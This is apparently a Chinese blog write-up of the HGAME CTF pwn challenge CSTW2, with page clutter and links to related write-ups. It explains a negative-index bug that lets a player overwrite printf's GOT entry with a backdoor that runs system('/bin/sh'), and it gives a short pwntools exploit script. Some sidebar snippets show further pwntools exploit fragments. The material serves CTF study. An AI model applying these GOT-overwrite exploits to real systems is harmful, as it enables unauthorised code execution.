CTF-PWN-CSTW2(Hgame week2)

最新推荐文章于 2022-02-04 22:32:37 发布

原创最新推荐文章于 2022-02-04 22:32:37 发布 · 376 阅读

0 ·

CC 4.0 BY-SA版权

CTF-PWN 专栏收录该内容

24 篇文章

订阅专栏

本文深入解析了CSTW2程序中的read_int函数漏洞，并演示了如何通过控制v5变量来实现对got表的操作，最终劫持printf函数指向backdoor函数，达到执行system('/bin/sh')的效果。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

程序大概就是这么回事，read_int顾名思义，就是一个读入int的函数。虽然题目中要求我们输入的是一个正数，但是我们可以输入负数，可以将其当作一个突破点。

if(v5<=23)内部的read_n，第一个参数是输入的字符串存入的首地址，第二个参数是读入的长度。这个0x6020e0非常可疑，我们可以先进入其中查看。

发现这是一个程序中的地址，因此在进行字符串读入的时候，字符串被存入16*v5+0x6020E0中，由于我们可以控制v5，因此我们可以考虑对got表进行操作，劫持一个库函数执行system的功能。

本来执行system函数需要我们找到system的偏移量和构造/bin/sh的shellcode，但是查看程序所有函数之后，发现backdoor给予了我们一个system("/bin/sh")，因此我们只需将一个函数劫持为backdoor即可

这里我选择劫持printf函数，由于printf函数的偏移量存在ox602040，故计算好偏移量即可

from pwn import *
context.log_level='debug'
p=process('./CSTW2')
#p=remote('118.24.3.214',11000)
for i in range(5):
	p.sendline('')
p.sendlineafter('>','-9')
p.sendlineafter('>',p64(0x40096A))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

SuperGate

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Hgame

忙碌者的博客

02-06

5359

Hgame WEEK1 1.换头大作战题目地址题目首先是这样一个界面，既然让我提交，那自然要提交试试，随便填个1进去提交试试。提交完提示： request method is error.I think POST is better 既然让我POST，果断调出HACKBAR，同时注意到url后面多了个want变量，自然想到去POST这个want。构造want=1,RUN,得到下图：需要lo...

HGAME 2017 or 2018 PWN levels

qq_42192672的博客

11-12

1004

这个算是做之前的复现吧，感谢Veritas501 WEEK1 1.flag server 拖进IDA看一下流程倒着看，要有flag-----v8=1-----v5=v6-----s1=admin，我们可以把s1覆盖掉-----username长度不能大于63，不能等于0-----之后还要猜出随机数v6，看一下怎么覆盖这些变量都在一起，美滋滋 exp from pwn...

参与评论您还未登录，请先登录后发表或查看评论

PWN-COMPETITION-HGAME2022-Week2

P1umH0的博客

02-04

1921

PWN-COMPETITION-HGAME2022-Week2blind(unsolved)echo_severoldfashion_note blind(unsolved) echo_sever 堆上的格式化字符串漏洞当输入的v0为0时，realloc(ptr,0)相当于free(ptr) 于是考虑将free_hook写为one-gadget # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process(".

hgame2021 week2 pwn刷题

qq_45595732的博客

02-14

472

rop_primary 矩阵相乘，算法分析用过numpy就直接调用numpy现有的库了，常规栈溢出，但是不知道为什么system的系统调用貌似被禁用了，所以用了orw，没拿shell from pwn import* import numpy as np from LibcSearcher import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) elf = ELF('./rop_prim

CTF-RE-わかります(hgame2018)

SuperGate的博客

01-27

2532

Hgame week1里面应该说是最难的一个题。主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位，v7则是后4位，这里的位是二进制位。然后分别将两个dword_6021xx数组找出来，点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。其中v9生成函数比较容易求出v9，v...

CTF-RE-shinyshot!(Hgame week2)

SuperGate的博客

02-17

732

hd的师傅们出的题还是十分有意思的……这道题花了很多天时间才有了头绪，现在才搞出来。我们把程序扔进ida反复调试后发现了一个奇怪的函数:sub_401460(v10)，这个函数将我们输入的数字进行操作。我们点进去看：很懵逼，没有见过的底层函数，和奇奇怪怪的变量名称。由于内部对toplevelexceptionfilter变量进行的操作比较多，我们首先关注这个变量。在每次调试的时候都...

CTF-PWN-babysc(Hgame)

SuperGate的博客

02-04

857

直接运行该程序，发现没有任何提示信息，随便输入一串字符之后，程序错误退出。扔进ida查看: 程序用read函数读入buf，然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量，buf长度为80 然后对于buf[i] ，异或buf[i]^(i+1)，最后将buf蕴含的指令赋值给rdx并执行。我们可以考虑直接构造system(/bin/sh...

ctf题库ctf-pwn赛题收集

03-31

ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能，包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成，例如Web安全、二...

CTF-Pwn-[BJDCTF 2nd]rci

01-09

CTF-Pwn-[BJDCTF 2nd]rci 博客说明文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！ CTP平台网址 ...

CTF-misc工具2-CTF-Tools-masterV1.3.7

08-17

CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。使用场景: 在CTF竞赛...

基于C语言的CTF-PWN方向入门课程《为缺少指导的同学而生》设计源码

最新发布

02-07

本项目源码为CTF（Capture The Flag，夺旗赛）中的PWN（漏洞利用）方向提供了一个系统的入门课程。CTF是一种信息安全竞赛，参赛者需要解决各种信息安全问题，而PWN是其中的一个重要领域，主要涉及发现和利用软件中的...

Elieen：使用JSON配置CTF-Pwn中的Docker容器.zip

06-19

pwn_dockers：pwn类配置 project_path：[nullable] docker相关资源的文件夹，也是最后Dockerfile生成的文件夹 filename：二进制文件名字 docker_username：docker中运行程序的用户名 image_name：镜像文件名称，...

SuperModel(3D图像查看器) v25.0.zip

07-10

SuperModel(3D图像查看器) v25.0更新： 1. 大幅度更新了界面 2. 解决了其它一些琐碎的BUG SuperModel是一款简单易用，晶莹剔透的3D模型和图像查看器。 SuperModel目前支持的格式有： .3DS、.OBJ、.MD2、.MD3、.MS3D、.X； .JPG、.PNG、.GIF、.BMP、.TGA、.DDS、.DIB、.HDR、.PFM、.PPM、.PCX、.ICO、.CUR、WBMP、TIF。

HGAME2020 Final Writeup

wh201906的博客

03-08

832

居然能苟进决赛绝了 Misc - Good Video 题目： Need a video to fresh your mind? 终于又见到misc了先binwalk扫了一遍压缩包和视频文件，得到了一大堆东西。。。。。（居然还有vmdk？）查了一下头部的EBML文件格式，发现这是一种面向未来的音视频框架，而且之后的Matroska也是一种封装格式这些文件格式为了支持未来出现的新压...

Hgame第二周reserver（maze）

Hu4

03-09

624

拿到题目拖进UE里看到 ELF文件·· 懒得开ubuntu了直接拖进IDAX64 来到main函数 F5 一顿分析 int __cdecl main(int argc, const char **argv, const char **envp) { int result; // eax@4 __int64 v4; // rdx@4 char v5; // [...

re学习笔记（32）HGAME2020-re-Level-Week2- babypy

逆向随笔

01-30

1227

HGAME2020-re-Level-Week2- babypy 新手一枚，如有错误（不足）请指正，谢谢！！个人博客：点击进入参考资料：python字节码学习 Python 字节码反汇编器|官方文档题目描述描述 CPython uses a stack-based virtual machine.dc26c1359ec66 题目地址 http://q432pxpwq.bkt.cloudd...

hgame-2018 CTFwp（杭电信安）week1

苟有恒，必有三更眠，五更起。

03-04

3171

原题链接由于开放时间短，不知道什么时候结束。我会将题目的大致内容以图片形式down下来。 web1 Are you from Europe? URL http://123.206.203.108:10001/European.html 一看题，就感觉想是用burp抓包做，来自欧洲，就想到改语言，accept-langue字段。但是，我试了en，gk等等值，并没有什么卵用。而且发现

Hgame-2019几道有趣的RSA

Gard3nia的博客

03-03

1323

babyRSA e = 12 p = 58380004430307803367806996460773123603790305789098384488952056206615768274527 q = 81859526975720060649380098193671612801200505029127076539457680155487669622867 ciphertext = 2060872...

CTFHub-技能树-pwn

01-01

### CTFHub Pwn 技能树教程与资源 Pwn 类型的挑战通常涉及利用程序中的漏洞来获取控制权。这类题目可以测试参赛者对二进制文件的理解以及逆向工程的能力。在 CTF竞赛中，`pwntools` 是一个非常流行的 Python 库，用于开发针对这些类型的攻击工具[^3]。下面是一个简单的例子展示了如何使用 `pwntools` 进行远程连接并发送有效载荷： ```python from pwn import * p = remote("example.com", port_number) payload = b'a'*(buffer_size)+pack(address, 64) # 构造溢出字符串加上返回地址 p.sendline(payload) p.interactive() ``` 此代码片段显示了一个典型的缓冲区溢出攻击过程，其中构造特定长度的数据串去覆盖函数栈帧内的保存指针，并将其重定向到恶意指令处执行。为了深入学习 pwn 技巧，在线社区提供了丰富的资源和支持材料。例如，《黑客&网络安全入门&进阶学习资源包》不仅涵盖了基础理论还包含了实际操作指南[^1]。此外，参与 CTF 比赛之后阅读优秀的 writeup 可以为理解不同场景下的解决方案提供很大帮助[^4]。